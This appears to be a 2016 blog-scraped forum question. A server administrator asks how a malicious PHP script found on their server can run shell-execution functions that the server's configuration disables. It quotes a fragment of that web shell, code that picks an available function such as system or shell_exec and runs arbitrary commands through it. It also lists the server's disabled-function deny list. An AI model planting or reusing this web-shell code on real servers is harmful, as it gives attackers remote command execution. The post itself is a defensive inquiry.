Sunday, March 20, 2016

linux - Php functions are disabled, but somehow they can be executed

I had one problem on my server today and I discovered malicious code which is used to gain access to my system for attacker.
I have downloaded that php script, but what was weird is that I saw functions which are disabled in my php configuration.



Disabled are: passthru,exec,shell_exec,system.... among others



How is that possible?



This is part of code




function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}

return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}

elseif($method == "exec")

{
exec($command,$result);
foreach($result as $output)
{
print $output."
";
}
}

elseif($method == "shell_exec")
{

print shell_exec($command);
}

elseif($method == "system")
{
system($command);
}
}
function perm($file)
{

if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}



Just to be sure that there are no left overs, I have copied that script to new account which no one has access to except me. There is no htaccess file or php.ini. Script still works on that account. I have created phpinfo file to see php configuration for that file and here are disabled functions.



pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen


As you can see, listed functions which are used in that script are inside disabled functions.



When I try to run some of disabled functions I get message




Warning: system() has been disabled for security reasons in /home/user....


Just to make sure, I have uploaded that script to different server and same was possible. That server also has same disabled functions.



How can I prevent this from allowing someone access to my files?

No comments:

Post a Comment

linux - How to SSH to ec2 instance in VPC private subnet via NAT server

I have created a VPC in aws with a public subnet and a private subnet. The private subnet does not have direct access to external network. S...